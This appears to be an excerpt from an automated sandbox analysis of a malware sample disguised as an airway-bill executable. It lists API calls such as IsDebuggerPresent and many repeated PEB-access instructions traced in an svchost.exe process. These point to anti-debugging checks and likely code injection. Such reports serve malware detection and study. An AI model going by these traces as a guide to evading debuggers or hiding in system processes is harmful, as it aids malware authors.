            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00435CCC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00435CCC
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0047C304 LoadLibraryA,GetProcAddress, 0_2_0047C304
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F113 mov eax, dword ptr fs:[00000030h]2_2_02F2F113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60118 mov eax, dword ptr fs:[00000030h]2_2_02F60118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5510F mov eax, dword ptr fs:[00000030h]2_2_02F5510F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3510D mov eax, dword ptr fs:[00000030h]2_2_02F3510D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAC6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F296E0 mov eax, dword ptr fs:[00000030h]2_2_02F296E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F296E0 mov eax, dword ptr fs:[00000030h]2_2_02F296E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C6E0 mov eax, dword ptr fs:[00000030h]2_2_02F3C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F356E0 mov eax, dword ptr fs:[00000030h]2_2_02F356E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F356E0 mov eax, dword ptr fs:[00000030h]2_2_02F356E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F356E0 mov eax, dword ptr fs:[00000030h]2_2_02F356E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F566E0 mov eax, dword ptr fs:[00000030h]2_2_02F566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F566E0 mov eax, dword ptr fs:[00000030h]2_2_02F566E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5D6D0 mov eax, dword ptr fs:[00000030h]2_2_02F5D6D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F306CF mov eax, dword ptr fs:[00000030h]2_2_02F306CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA6C0 mov eax, dword ptr fs:[00000030h]2_2_02FFA6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD86C2 mov eax, dword ptr fs:[00000030h]2_2_02FD86C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF86A8 mov eax, dword ptr fs:[00000030h]2_2_02FF86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF86A8 mov eax, dword ptr fs:[00000030h]2_2_02FF86A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38690 mov eax, dword ptr fs:[00000030h]2_2_02F38690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC691 mov eax, dword ptr fs:[00000030h]2_2_02FBC691
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF68C mov eax, dword ptr fs:[00000030h]2_2_02FEF68C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40680 mov eax, dword ptr fs:[00000030h]2_2_02F40680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B781 mov eax, dword ptr fs:[00000030h]2_2_0300B781
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B781 mov eax, dword ptr fs:[00000030h]2_2_0300B781
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30670 mov eax, dword ptr fs:[00000030h]2_2_02F30670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72670 mov eax, dword ptr fs:[00000030h]2_2_02F72670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72670 mov eax, dword ptr fs:[00000030h]2_2_02F72670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F27662 mov eax, dword ptr fs:[00000030h]2_2_02F27662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F27662 mov eax, dword ptr fs:[00000030h]2_2_02F27662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F27662 mov eax, dword ptr fs:[00000030h]2_2_02F27662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43660 mov eax, dword ptr fs:[00000030h]2_2_02F43660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43660 mov eax, dword ptr fs:[00000030h]2_2_02F43660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43660 mov eax, dword ptr fs:[00000030h]2_2_02F43660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6666D mov esi, dword ptr fs:[00000030h]2_2_02F6666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6666D mov eax, dword ptr fs:[00000030h]2_2_02F6666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6666D mov eax, dword ptr fs:[00000030h]2_2_02F6666D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F65654 mov eax, dword ptr fs:[00000030h]2_2_02F65654
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3965A mov eax, dword ptr fs:[00000030h]2_2_02F3965A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3965A mov eax, dword ptr fs:[00000030h]2_2_02F3965A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6265C mov eax, dword ptr fs:[00000030h]2_2_02F6265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6265C mov ecx, dword ptr fs:[00000030h]2_2_02F6265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6265C mov eax, dword ptr fs:[00000030h]2_2_02F6265C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F33640 mov eax, dword ptr fs:[00000030h]2_2_02F33640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F640 mov eax, dword ptr fs:[00000030h]2_2_02F4F640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F640 mov eax, dword ptr fs:[00000030h]2_2_02F4F640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4F640 mov eax, dword ptr fs:[00000030h]2_2_02F4F640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C640 mov eax, dword ptr fs:[00000030h]2_2_02F6C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C640 mov eax, dword ptr fs:[00000030h]2_2_02F6C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D64A mov eax, dword ptr fs:[00000030h]2_2_02F2D64A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D64A mov eax, dword ptr fs:[00000030h]2_2_02F2D64A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030017BC mov eax, dword ptr fs:[00000030h]2_2_030017BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30630 mov eax, dword ptr fs:[00000030h]2_2_02F30630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60630 mov eax, dword ptr fs:[00000030h]2_2_02F60630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8633 mov esi, dword ptr fs:[00000030h]2_2_02FB8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8633 mov eax, dword ptr fs:[00000030h]2_2_02FB8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8633 mov eax, dword ptr fs:[00000030h]2_2_02FB8633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6F63F mov eax, dword ptr fs:[00000030h]2_2_02F6F63F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6F63F mov eax, dword ptr fs:[00000030h]2_2_02F6F63F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F37623 mov eax, dword ptr fs:[00000030h]2_2_02F37623
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD62C mov ecx, dword ptr fs:[00000030h]2_2_02FDD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD62C mov ecx, dword ptr fs:[00000030h]2_2_02FDD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD62C mov eax, dword ptr fs:[00000030h]2_2_02FDD62C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F35622 mov eax, dword ptr fs:[00000030h]2_2_02F35622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F35622 mov eax, dword ptr fs:[00000030h]2_2_02F35622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C620 mov eax, dword ptr fs:[00000030h]2_2_02F6C620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC3608 mov eax, dword ptr fs:[00000030h]2_2_02FC3608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5D600 mov eax, dword ptr fs:[00000030h]2_2_02F5D600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5D600 mov eax, dword ptr fs:[00000030h]2_2_02F5D600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF607 mov eax, dword ptr fs:[00000030h]2_2_02FEF607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6360F mov eax, dword ptr fs:[00000030h]2_2_02F6360F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004600 mov eax, dword ptr fs:[00000030h]2_2_03004600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F377F9 mov eax, dword ptr fs:[00000030h]2_2_02F377F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F377F9 mov eax, dword ptr fs:[00000030h]2_2_02F377F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E7E0 mov eax, dword ptr fs:[00000030h]2_2_02F5E7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F337E4 mov eax, dword ptr fs:[00000030h]2_2_02F337E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF7CF mov eax, dword ptr fs:[00000030h]2_2_02FEF7CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307A7 mov eax, dword ptr fs:[00000030h]2_2_02F307A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFD7A7 mov eax, dword ptr fs:[00000030h]2_2_02FFD7A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFD7A7 mov eax, dword ptr fs:[00000030h]2_2_02FFD7A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFD7A7 mov eax, dword ptr fs:[00000030h]2_2_02FFD7A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F61796 mov eax, dword ptr fs:[00000030h]2_2_02F61796
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F61796 mov eax, dword ptr fs:[00000030h]2_2_02F61796
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE79D mov eax, dword ptr fs:[00000030h]2_2_02FAE79D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60774 mov eax, dword ptr fs:[00000030h]2_2_02F60774
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34779 mov eax, dword ptr fs:[00000030h]2_2_02F34779
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34779 mov eax, dword ptr fs:[00000030h]2_2_02F34779
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F42760 mov ecx, dword ptr fs:[00000030h]2_2_02F42760
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 mov eax, dword ptr fs:[00000030h]2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov ecx, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52755 mov eax, dword ptr fs:[00000030h]2_2_02F52755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A750 mov eax, dword ptr fs:[00000030h]2_2_02F6A750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F75B mov eax, dword ptr fs:[00000030h]2_2_02F2F75B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE750 mov eax, dword ptr fs:[00000030h]2_2_02FDE750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F63740 mov eax, dword ptr fs:[00000030h]2_2_02F63740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6174A mov eax, dword ptr fs:[00000030h]2_2_02F6174A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F59723 mov eax, dword ptr fs:[00000030h]2_2_02F59723
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3471B mov eax, dword ptr fs:[00000030h]2_2_02F3471B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3471B mov eax, dword ptr fs:[00000030h]2_2_02F3471B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF717 mov eax, dword ptr fs:[00000030h]2_2_02FEF717
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3D700 mov ecx, dword ptr fs:[00000030h]2_2_02F3D700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF970B mov eax, dword ptr fs:[00000030h]2_2_02FF970B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF970B mov eax, dword ptr fs:[00000030h]2_2_02FF970B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2B705 mov eax, dword ptr fs:[00000030h]2_2_02F2B705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5270D mov eax, dword ptr fs:[00000030h]2_2_02F5270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5270D mov eax, dword ptr fs:[00000030h]2_2_02F5270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5270D mov eax, dword ptr fs:[00000030h]2_2_02F5270D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF4FD mov eax, dword ptr fs:[00000030h]2_2_02FEF4FD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364F0 mov eax, dword ptr fs:[00000030h]2_2_02F364F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A4F0 mov eax, dword ptr fs:[00000030h]2_2_02F6A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A4F0 mov eax, dword ptr fs:[00000030h]2_2_02F6A4F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F594FA mov eax, dword ptr fs:[00000030h]2_2_02F594FA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F654E0 mov eax, dword ptr fs:[00000030h]2_2_02F654E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E4EF mov eax, dword ptr fs:[00000030h]2_2_02F6E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E4EF mov eax, dword ptr fs:[00000030h]2_2_02F6E4EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F544D1 mov eax, dword ptr fs:[00000030h]2_2_02F544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F544D1 mov eax, dword ptr fs:[00000030h]2_2_02F544D1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5F4D0 mov eax, dword ptr fs:[00000030h]2_2_02F5F4D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F514C9 mov eax, dword ptr fs:[00000030h]2_2_02F514C9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E4BC mov eax, dword ptr fs:[00000030h]2_2_02F6E4BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F324A2 mov eax, dword ptr fs:[00000030h]2_2_02F324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F324A2 mov ecx, dword ptr fs:[00000030h]2_2_02F324A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBD4A0 mov ecx, dword ptr fs:[00000030h]2_2_02FBD4A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBD4A0 mov eax, dword ptr fs:[00000030h]2_2_02FBD4A0
